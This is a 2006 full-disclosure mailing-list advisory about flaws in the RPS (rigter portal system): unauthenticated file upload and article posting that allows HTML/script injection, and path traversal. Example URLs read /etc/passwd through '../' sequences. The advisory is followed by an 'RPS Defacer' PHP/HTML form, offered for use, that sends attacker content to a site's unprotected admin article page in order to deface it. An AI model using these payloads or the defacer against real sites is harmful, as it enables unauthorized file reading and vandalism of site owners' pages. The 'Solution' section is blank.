########################################################################### # Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system) # # # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: zeus at diosdelared.com # Website: www.elitemexico.org # Date: 18/07/06 # Risk: medium # Vendor Url: http://rps.rigtersir.com/ # Affected Software: RPS # Non Affected: RPS V 4 # #Info: ################################################################## #UPLOAD FILES # it allows the user to raise archives without having administration privileges # # #SQL inyecci&#243;n #it allows the user to insert post without having to be admin with this can make xss or #HTML injection # # #example of upload files ################################################################## # #http://www.vuln.com/[path]/adm/photos/images.php # #http://www.vuln.com/[path]//adm/down/files.php # ################################################################## #example Remote Execution ################################################################## # #http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd # #http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index # ################################################################## # #Solution: ################################################################## # # #VULNERABLE VERSIONS ################################################################## # v1.0, 2.0 3.0 # ################################################################## #Contact information #0o_zeus_o0 #zeus at diosdelared.com #www.elitemexico.org ################################################################## #greetz: lady fire,Mi beba, olimpus klan team and elitemexico # #Original Advisory: http://zeus.pccentervillaflores.com//13.txt ################################################################## SQL inyecci&#243;n in "Articulos" exploit <?php /* RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN &#8226;~ FX ~&#8226; Date: 08/01/06 Website: www.elitemexico.org */ ?> <html> <head> <title>RPS Defacer</title> </head> <body text="#FFFFFF" bgcolor="#000000"> <p align="center"><font face="Verdana" size="2"><b><u><font color="#FF0000">RPS Defacer<br> <br> </font> </u><font color="#FF0000">0o_ZEUS_o0 OliMpusKlaN <br /> &#8226;~ FX ~&#8226;</font></b></font></p> <form method="POST" ACTION="?action=enviar" name="rps_defacer"> <center> <table border="0" cellpadding="5" cellspacing="0" style="border-collapse: collapse" width="40%"> <tr> <td width="100%"><b><font face="Verdana" size="1">Direccion:<br> <input type="text" name="url" size="30" value="http://"></font></b></td> </tr> <tr> <td width="100%"><b><font size="1" face="Verdana">Autor:<br> <input type="text" name="autor" size="20"></font></b></td> </tr> <tr> <td width="100%"><b><font face="Verdana"><font size="1">Email:<br> <input type="text" name="email" size="20"></font></font></b></td> </tr> <tr> <td width="100%"><b><font size="1" face="Verdana">Titulo:<br> <input type="text" name="titulo" size="30"></font></b></td> </tr> <tr> <td width="100%"><b><font size="1" face="Verdana">Contenido: (Soporta HTML Inyection)<br> <textarea rows="13" name="articulo" cols="55"></textarea></font></b></td> </tr> <tr> <td width="100%"> <p align="center"><b><font face="Verdana" size="1"> <input type="submit" value="Enviar" name="send"> <input type="reset" value="Restablecer" name="delete"></font></b></td> </tr> </table> </center> </div> </form> <? if($action=="enviar"){ $web= $_POST['url']; echo "<script LANGUAGE="JavaScript"> var pagina="$web/adm/add_art.php" function redireccionar() { location.href=pagina } setTimeout ("redireccionar()", 0001); </script>"; } ?> </body> </html> -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060718/6a70b9b5/attachment.html